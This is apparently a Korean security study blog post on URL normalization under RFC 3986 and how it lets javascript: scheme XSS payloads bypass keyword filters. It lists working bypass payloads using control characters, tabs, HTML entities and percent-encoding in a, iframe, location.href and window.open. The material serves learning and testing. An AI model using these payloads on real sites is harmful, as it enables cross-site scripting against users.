URL Normalization with XSS

URL Normalization에 대해서 알아봅시다.
추가로 URI Normalization으로 인한 javascript scheme 필터링 우회 XSS Payload를 알아봅시다.
마지막으로는 filename_XSS에서 궁금한 점을 찾아보았습니다.

URL Normalization

브라우저는 URL을 사용할 때 Normalization을 합니다.
정규화(Noramlization)는 동일한 리소스를 나타내는 서로 다른 URL들을 통일된 형태로 변환하는 과정입니다

RFC 3986 문서를 보면 어떤 규칙으로 정규화 되는지를 알 수 있습니다.

또한 여러 유형의 정규화가 수행할 수 있으먀, 그 중 일부는 항상 의미 보존이 보장되는 반면, 일부는 그렇지 않을 수 있습니다.
여기서 의미 보존 보장이란 정규화 후 복원 과정에서 원래의 의미가 손실되지 않는 것입니다.

Active Hyperlink

HTML 마크업에서 사용될 수 있는 URL들은 활성 콘텐츠를 포함할 수 있습니다.
이 중 javascript: 스키마는 URL 로드 시 자바스크립트 코드를 실행할 수 있도록 합니다.

a & iframe Tag XSS

javascript단어가 필터링 되어 있을 경우 정규화를 거치면서 URI에 포함된 줄바꿈문자(\n, \x0a), 탭(\t, \x09), 그외 특수문자 \x01, \x04 등이 제거되므로 이를 우회하여 스크립트 삽입이 가능합니다.

추가적으로 HTML 태그 속성 내에 HTML Entity Encoding을 사용하여 우회할 수 도 있습니다.

  
<a href="\1\4jAVasC\triPT:alert(document.domain)">Click me!</a>
<iframe src="\1\4jAVasC\triPT:alert(document.domain)">

<a href="\1&#4;J&#97;v&#x61;sCr\tip&tab;&colon;alert(document.domain);">Click me!</a>
<iframe src="\1&#4;J&#97;v&#x61;sCr\tip&tab;&colon;alert(document.domain);">

자바스크립트에서는 URL 객체를 통해 URL을 직접 정규화할 수 있으며, protocol, hostname 등 URL의 각종 정보를 추출할 수 있습니다.
XSS 필터링 우회 공격 구문을 작성하기 위해 직접 URL을 정규화해보며 테스트하는 것이 가능합니다.

  
function normalizeURL(url) {
    return new URL(url, document.baseURI);
}
normalizeURL('\4\4jAva\tScRIpT:alert(1)').href
--> "javascript:alert(1)"
normalizeURL('\4\4jAva\tScRIpT:alert(1)').protocol
--> "javascript:"
normalizeURL('\4\4jAva\tScRIpT:alert(1)').pathname
--> "alert(1)"

My Guess ?!

filename_XSS에서 href 안에 URL Decoding이 처리되는 것을 알 수 있습니다. 궁금한 점은 혹시 다른 부분에서도 가능한지를 알아 보았고 <iframe src=>, location.href, window.open에서도 가능한 것을 알았습니다.

HTML 태그 안에서 attribute, 혹은 javascript에 property, method에 URL이 들어가는 부분이 있습니다.

  
<a href = "https://glasses96.github.io">test</a>
<iframe src = "https://glasses96.github.io"></iframe>
<script>location.href="https://glasses96.github.io"</script>
<script>window.open="https://glasses96.github.io"</script>

attribute 안에 javascript 스키마와 % Encoding을 넣게되면 동작을 안할줄 알았는데 동작이 잘됩니다.
아래의 코드 예시를 보면 %28,%29 -> ( ), %22 -> " 으로 먹히는 것을 확인할 수 있습니다.

  
<img src="javascript:alert%28%22glasses96%22%29"> -> 동작 안함
<a href="javascript:alert%28%22glasses96%22%29"> -> 동작
<iframe src="javascript:alert%28%22glasses96%22%29"> -> 동작
<script>location.href="javascript:alert%28%22glasses96%22%29"</script> -> 동작
<script>window.open="javascript:alert%28%22glasses96%22%29"</script> -> 동작

Conclusion

URL Normalize로 인하여 URL Decoding이 적용되어 동작하는 것이 아닌가라는 생각을 했지만 RFC3986 2.4 문서를 봤을 때는 아닌거 같습니다..
흐음….. 명쾌한 답은 얻지 못했습니다ㅜㅜ

2.4.  When to Encode or Decode

   Under normal circumstances, the only time when octets within a URI
   are percent-encoded is during the process of producing the URI from
   its component parts.  This is when an implementation determines which
   of the reserved characters are to be used as subcomponent delimiters
   and which can be safely used as data.  Once produced, a URI is always
   in its percent-encoded form.

   When a URI is dereferenced, the components and subcomponents
   significant to the scheme-specific dereferencing process (if any)
   must be parsed and separated before the percent-encoded octets within
   those components can be safely decoded, as otherwise the data may be
   mistaken for component delimiters.  The only exception is for
   percent-encoded octets corresponding to characters in the unreserved
   set, which can be decoded at any time.  For example, the octet
   corresponding to the tilde ("~") character is often encoded as "%7E"
   by older URI processing implementations; the "%7E" can be replaced by
   "~" without changing its interpretation.

   Because the percent ("%") character serves as the indicator for
   percent-encoded octets, it must be percent-encoded as "%25" for that
   octet to be used as data within a URI.  Implementations must not
   percent-encode or decode the same string more than once, as decoding
   an already decoded string might lead to misinterpreting a percent
   data octet as the beginning of a percent-encoding, or vice versa in
   the case of percent-encoding an already percent-encoded string.

XSS 취약점을 수동으로 쫌 빠르게 찾기 위해서 Burp Repeater 기능을 이용하여 ', ", <, >등 과 같이 특수문자를 넣었을 때 그대로 반환 되는 지 여부를 찾았는데 입력값이 %22, %27처럼 반환될 경우 보통 value 안에 “” 묶여있어 탈출이 불가능하다고 생각하여 넘어가는 경우가 많았습니다.
물론 안에 "~~~~test.com?q=[입력값]" 이런식으로 들어가서 스크립트를 동작시키기에는 무리였지만 해당 값이 HTML Attribute 어디에 들어가는지 보고 한번 더 생각할 수 있을 꺼 같습니다.

Reference

https://learn.dreamhack.io/318#8
https://www.ietf.org/rfc/rfc3986.txt

URL Normalization with XSS